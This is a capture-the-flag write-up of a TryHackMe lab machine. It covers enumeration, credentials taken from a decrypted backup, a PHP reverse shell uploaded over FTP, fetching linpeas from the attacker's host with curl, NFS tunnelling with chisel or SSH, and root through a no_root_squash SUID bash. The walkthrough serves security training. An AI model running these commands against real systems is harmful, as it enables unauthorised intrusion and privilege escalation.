This is the write-up for TryHackMe’s room named Overpass3 — Hosting. This is the third part of the series of rooms named Overpass.
This room can be found at this URL:- https://tryhackme.com/room/overpass3hosting
So lets begin.
# Identify the list of services running on the target machine
sudo nmap -sS -Pn -T4 -p- 10.10.163.156
# Perform further information gathering on the open ports identified above
sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.163.156
So we have total 3 ports open.
Port 21 FTP vsftpd 3.0.3 doesn’t have any know vulnerabilities and there is no anonymous access.
Port 22 SSH OpenSSH 8.0 is also quite recent. So lets keep it for later.
Port 80 have an Apache Web Server, so lets first try to brute force the directories on the Web Server.
Lets use gobuster:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.163.156 -t 40
Ah, we have a folder named “backups”. So lets browse to that folder using our favorite browser.
Download “backup.zip” file which we found above and unzip it.We found 2 files:
OK,So we have a file encrypted with a gpg key. Let use the following command to get the actual file:
gpg — import priv.key
Which gives us:- CustomerDetails.xlsx. Open it with LibreOffice and we get some credentials.
Try these credentials with FTP and we will find that user “paradox” works.We can also see that the ftp directory allows us to upload files. We will upload a php reverse shell,execute it and will catch it with netcat.
Get the php reverse shell from:- https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php and update it with your own attacker machine IP address and the port you want to catch the reverse shell.
Access web shell from the browser as:
Catch the reverse shell as:
nc -nlvp 9999
We got a basic shell and lets stabilize the shell with the following commands:
/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
Now we have a fully working shell with “apache” user.
The web flag was a bit difficult to find, but ultimately found it using
find / -name *web* 2>/dev/null
Now we have a stable shell,it is time to do privilege escalation. Transfer “linpeas.sh” to the target and run it to see if we can find anything that can help us in escalating our privileges:
On Attacker box:
python3 -m http.server
On Target box:
cd /tmp; curl http://YOUR-IP:8000/linpeas.sh > linpeas.sh
chmod +x linpeas.sh
Get the latest linpeas.sh from:- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
Running linpeas.sh reveals few interesting things.
So there is our know user “paradox” which also have a console,so may be reusing the password discovered from CustomerDetails.xlsx we can escalate to user “paradox”.
Indeed we can!
So the user “james” have a NFS setup with “no_root_squash”.Linpeas is clearly indicating that this is a potential Privilege Escalation vector and if we following the link given we can find how to exploit it:- https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
If we run showmount from out attacking box on to the target,we get an error:
showmount -e 10.10.119.118
From the man page of showmount:- show mount information for an NFS server.Also the port which is usually used for NFS is 2049.Our initial NMAP scan also didn’t revealed this port and show mount is giving us error. This indicates that something is blocking NFS. Lets confirm that if it is at all running on the target . We can transfer “netstat” from /usr/bin/ on kali box on to the target as both are 64 bit targets. Transfer netstat exe on to the target and run it like:
This confirms that NFS service is running on target but we cannot reach to it from our kali machine. So we can try tunneling to reach to NFS. Transferring dynamic exes may or may not work because of dependencies issues. An alternative method is to check the open tcp or udp ports by using the proc file system using command:
Here values are shown in hexadecimal. 0x0801 is actually our NFS port 2049.
We will use an awesome tool called chisel to do our pivoting/tunneling.You can get the tool from here and build it using very simple instructions given in the tool’s description: https://github.com/jpillora/chisel
Build and transfer chisel on to the target machine and run it on the kali and on the target as:
./chisel server -p 8000 — reverse -v
So here we ran chisel as server,which is waiting for reverse connections from the target.
./chisel client 10.8.98.192:8000 R:2049:127.0.0.1:2049
This syntax deserves little bit of explanation. On the target — chisel is running as a client talking to the server(kali machine) at 10.221.98.192:8000 and forwarding the NFS port 2049 on 127.0.0.1 i.e. on the target on to the “R” reverse port i.e. port 2049 on kali machine.
Now from kali access the NFS port like:
sudo mount -vvvv -t nfs4 127.0.0.1:/ /mnt
Here little bit of research was required to access the nfs as it was version 4 and the mount syntax was also bit different to old nfs version. We were able mount /home/james on to /mnt on our attacking kali machine and got our user flag.
Now from here it is quite trivial to get the root.From kali machine,copy the bash binary as root and also give execute permissions to all for the bash binary as well as add a suid bit on bash and just run the binary on the target with “p” flag to get root.
sudo chmod 777 /mnt
sudo cp /bin/bash /mnt
sudo chmod +s /mnt/bash
We got our root flag.
We can also use SSH to do our tunneling. We need to create SSH keys pair on kali as the “paradox” user. We can make a dummy user paradox on kali and can create these keys using:
Then transfer id_rsa.pub on to target directory /home/paradox/.ssh and then on the target run:
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
chmod 644 id_rsa.pub
Then from kali make the SSH tunnel using the following command:
ssh -f -N -L 2049:localhost:2049 firstname.lastname@example.org -i id_rsa
And mount the nfs directory as we did previously. Rest of the steps to get the root shell are same as in the above method where we used chisel for tunneling.
This was indeed a fun room and I enjoyed working on it. Hope you find this write up useful. Thanks for reading and have a good day :)